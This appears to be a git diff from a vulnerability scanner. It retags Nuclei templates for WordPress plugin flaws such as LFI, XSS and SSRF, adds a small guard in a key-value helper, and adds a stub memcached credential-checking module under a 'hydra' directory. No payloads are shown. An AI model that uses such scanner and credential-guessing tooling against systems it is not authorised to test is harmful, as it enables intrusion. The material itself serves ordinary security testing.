a/config/nuclei-templates/vulnerabilities/wordpress/wp-security-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-security-open-redirect.yaml index 2b7955eb8..98f1e3b08 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-security-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-security-open-redirect.yaml @@ -10,7 +10,7 @@ info: - https://wpscan.com/vulnerability/9898 metadata: verified: true - tags: wp-plugin,redirect,wordpress,wp + tags: wp-plugin,redirect,wordpress,wp,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml index c6fd4cc1a..070f13bcd 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6426 - tags: wordpress,listing,plugin + tags: wordpress,listing,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml index 643332b2f..d491da37b 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml @@ -7,7 +7,7 @@ info: description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution. reference: - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html - tags: wordpress,wp-plugin,lfi + tags: wp-plugin,lfi,packetstorm,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 49be6efa9..c024114cc 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://www.exploit-db.com/exploits/37948 - tags: wordpress,xss,wp-plugin + tags: wordpress,xss,wp-plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-socialfit-xss.yaml index 91ea8abca..3b6b2ad8b 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-socialfit-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wordpress,xss,wp-plugin + tags: wordpress,xss,wp-plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml index ba80c879e..9f63edbf1 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ - tags: wordpress,backup + tags: wordpress,backup,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-super-forms.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-super-forms.yaml index 836e6dc4a..e8015bd85 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-super-forms.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-super-forms.yaml @@ -7,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6776 - tags: wordpress,listing,plugin + tags: listing,plugin,edb,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-tutor-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-tutor-lfi.yaml index 4362f3d8a..31a1ba739 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-tutor-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-tutor-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml index 2b8590d60..f965a6c84 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml @@ -11,7 +11,7 @@ info: - https://packetstormsecurity.com/files/161576/ metadata: verified: true - tags: ssrf,wp,wp-plugin,wordpress,unauth + tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml index 8aa314188..083cc7c49 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wp-plugin,wordpress,lfi + tags: lfi,edb,wp-plugin,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml index 3cf7543a7..cab4da6eb 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-288 - tags: wordpress,wp-plugin,woocommerce,wp + tags: woocommerce,wp,wpscan,wordpress,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wpdm-cache-session.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wpdm-cache-session.yaml index bb345d29f..51acfbbbb 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wpdm-cache-session.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wpdm-cache-session.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://www.exploit-db.com/ghdb/7004 - tags: wordpress + tags: wordpress,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml index 404a97714..db4d6a199 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml @@ -9,7 +9,7 @@ info: - https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c metadata: verified: true - tags: wp,wordpress,xss,wp-plugin,wpify + tags: wp,wordpress,xss,wp-plugin,wpify,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/wpmudev-pub-keys.yaml b/config/nuclei-templates/vulnerabilities/wordpress/wpmudev-pub-keys.yaml index 649ce1c6f..660da19b6 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/wpmudev-pub-keys.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/wpmudev-pub-keys.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://www.exploit-db.com/ghdb/6443 - tags: wordpress + tags: wordpress,edb requests: - method: GET diff --git a/lib/util/kvDb.go b/lib/util/kvDb.go index d8151c3e0..9f1963cf0 100644 --- a/lib/util/kvDb.go +++ b/lib/util/kvDb.go @@ -93,6 +93,9 @@ func (r *KvDbOp) Get(key string) (szRst []byte, err error) { return szRst, err } func PutAny[T any](key string, data T) { + if "" == key { + return + } d, err := json.Marshal(data) if nil == err && nil != Cache1 { Cache1.Put(key, d) diff --git a/pkg/hydra/memcached/crkmmc.go b/pkg/hydra/memcached/crkmmc.go new file mode 100644 index 000000000..d914dd2f9 --- /dev/null +++ b/pkg/hydra/memcached/crkmmc.go @@ -0,0 +1,26 @@ +package memcached + +// /~https://github.com/memcached/memcached/blob/master/doc/protocol.txt +// https://www.zybuluo.com/phper/note/443547 +/* +Authentication +-------------- +Optional username/password token authentication (see -Y option). Used by +sending a fake "set" command with any key: + +set \r\n +username password\r\n + +key, flags, and exptime are ignored for authentication. Bytes is the length +of the username/password payload. + +- "STORED\r\n" indicates success. After this point any command should work + normally. + +- "CLIENT_ERROR [message]\r\n" will be returned if authentication fails for + any reason. + +*/ +func Check(Host, Username, Password string, Port int) (bool, error) { + return false, nil +}